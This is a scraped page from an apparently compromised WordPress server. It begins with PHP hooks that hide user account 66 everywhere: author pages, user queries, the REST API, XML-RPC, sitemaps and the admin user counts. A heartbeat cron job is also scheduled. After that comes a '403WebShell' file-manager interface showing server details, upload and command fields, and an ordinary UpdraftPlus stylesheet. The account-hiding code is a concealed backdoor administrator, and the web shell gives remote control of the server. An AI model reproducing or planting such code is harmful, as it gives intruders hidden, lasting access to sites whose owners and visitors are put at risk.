add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/axel/wp-content/plugins/updraftplus/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/axel/wp-content/plugins/updraftplus/css/updraftplus-tour.scss
$udp_primary: #DD6823;
$wp_blue: #0073AA;
.shepherd-theme-arrows-plain-buttons {
	z-index: 9999;
	max-width: 390px!important;
}

.shepherd-theme-arrows-plain-buttons.super-index {
	z-index: 999999;
}

.shepherd-element.shepherd-theme-arrows-plain-buttons .shepherd-content {
	border-radius: 3px;
	filter: none;
	box-shadow: 0px 1px 3px rgba(0, 0, 0, 0.15), 0px 10px 40px rgba(0, 0, 0, 0.15);
}

.shepherd-element-attached-bottom.shepherd-element-attached-right.shepherd-target-attached-top.shepherd-target-attached-left .shepherd-content:before,
.shepherd-element-attached-bottom.shepherd-element-attached-left.shepherd-target-attached-top.shepherd-target-attached-right .shepherd-content:before,
.shepherd-element-attached-top.shepherd-element-attached-right.shepherd-target-attached-bottom.shepherd-target-attached-left .shepherd-content:before,
.shepherd-element-attached-top.shepherd-element-attached-left.shepherd-target-attached-bottom.shepherd-target-attached-right .shepherd-content:before {
	display: none;
}

.shepherd-element.shepherd-theme-arrows-plain-buttons.shepherd-element-attached-top.shepherd-element-attached-center.shepherd-has-title .shepherd-content:before,
.shepherd-element.shepherd-theme-arrows-plain-buttons.shepherd-element-attached-top.shepherd-element-attached-right.shepherd-target-attached-bottom.shepherd-has-title .shepherd-content:before,
.shepherd-element.shepherd-theme-arrows-plain-buttons.shepherd-element-attached-top.shepherd-element-attached-left.shepherd-target-attached-bottom.shepherd-has-title .shepherd-content:before {
	border-bottom-color: $udp_primary;
}

.shepherd-element.shepherd-theme-arrows-plain-buttons.shepherd-has-title .shepherd-content header {
	background-color: $udp_primary;
	border-radius: 3px 3px 0 0;
	padding-right: 90px;
}

.shepherd-element.shepherd-theme-arrows-plain-buttons .shepherd-content header h3 {
	color: #FFF;
	font-size: 1.2em;
	float: none;
}

.shepherd-element.shepherd-theme-arrows-plain-buttons.shepherd-has-title .shepherd-content header a.shepherd-cancel-link {
	opacity: 0.7;
	color: rgba(255, 255, 255, 0);
	font-size: 0.8em;
	border: 1px solid #FFF;
	border-radius: 50%;
	width: 22px;
	height: 22px;
	line-height: 20px;
	padding: 0;
	text-align: center;
	float: none;
	position: absolute;
	right: 11px;
	top: 12px;

	&::before {
		color: #FFF;
		content: attr(data-btntext);
		position: absolute;
		right: 20px;
		padding-right: 10px;
	}
	&::after {
		content: "\f335";
		-webkit-font-smoothing: antialiased;
		-moz-osx-font-smoothing: grayscale;
		font-family: dashicons;
		color: #FFF;
		position: absolute;
		left: 2px;
		line-height: 21px;
		font-size: 16px;
	}
}

.shepherd-element.shepherd-theme-arrows-plain-buttons.shepherd-has-title .shepherd-content header a.shepherd-cancel-link:hover,
.shepherd-element.shepherd-theme-arrows-plain-buttons.shepherd-has-title .shepherd-content header a.shepherd-cancel-link:focus {
	border: 1px solid #A04E00;
	opacity: 1;
	&::before {
		color: #A04E00;
	}
	&::after {
		color: #A04E00;
	}
}

.shepherd-element.shepherd-theme-arrows-plain-buttons.shepherd-element-attached-top.shepherd-element-attached-left.shepherd-target-attached-right .shepherd-content:before {
	top: 44px;
}

.shepherd-content .ud-notice {

	background: #F0F0F0;
	padding: 14px;
	border-radius: 4px;
	font-size: 90% !important;
	line-height: 1.5;
	h3 {
		margin-top: 0;
		padding-top: 0;
		margin-bottom: .5em;
	}

}

.shepherd-element.shepherd-theme-arrows-plain-buttons .shepherd-content .shepherd-text p {
	margin-top: 0.5em;
	margin-bottom: 1.3em;
}

.ud-notice span.ud-special-offer {
	font-weight: bold;
	display: inline-block;
	padding: 1px 6px;
	border-radius: 3px;
	background: rgba(217, 105, 0, 0.09);
}

label[for=updraft_servicecheckbox_updraftvault] {

	border: 1px solid rgba(204, 204, 204, 0.4);
	transition: border .5s;
	&.emphasize {
		border-color: $udp_primary;
	}

}

.shepherd-element.shepherd-theme-arrows-plain-buttons .shepherd-content footer .shepherd-buttons li .shepherd-button.udp-tour-back,
.shepherd-element.shepherd-theme-arrows-plain-buttons .shepherd-content footer .shepherd-buttons li .shepherd-button.udp-tour-end {
	float: left;
	position: relative;
	padding-left: 10px;
}

.shepherd-element.shepherd-theme-arrows-plain-buttons .shepherd-content footer .shepherd-buttons li .shepherd-button.udp-tour-end {
	padding-left: 0;
	color: #B7B7B7;
}

.shepherd-element.shepherd-theme-arrows-plain-buttons .shepherd-content footer .shepherd-buttons li .shepherd-button.udp-tour-back::before {
	content: ' ';
	width: 6px;
	height: 6px;
	display: block;
	border-left: 1px solid;
	border-bottom: 1px solid;
	position: absolute;
	left: 0px;
	top: 8px;
	transform: rotate(45deg);
}

a.shepherd-button.udp-tour-end::before {
	display: inline-block;
	position: relative;
	content: "\f335";
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
	font-family: dashicons;
	font-size: 20px;
	line-height: 20px;
	vertical-align: middle;
	margin-top: -2px;
}

.updraftplus-welcome-logo {
	display: block;
	width: 70px;
	float: left;
	margin-top: -11px;
	margin-right: 12px;
}

.updraftplus-welcome-logo img {
	display: block;
	width: auto;
	max-width: 100%;
}

.highlight-udp .plugins #the-list tr:not([data-slug="updraftplus"]) {
	opacity: 0.3;
}

@media(max-width: 790px) {

	.shepherd-element.shepherd-theme-arrows-plain-buttons {
		display: none;
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit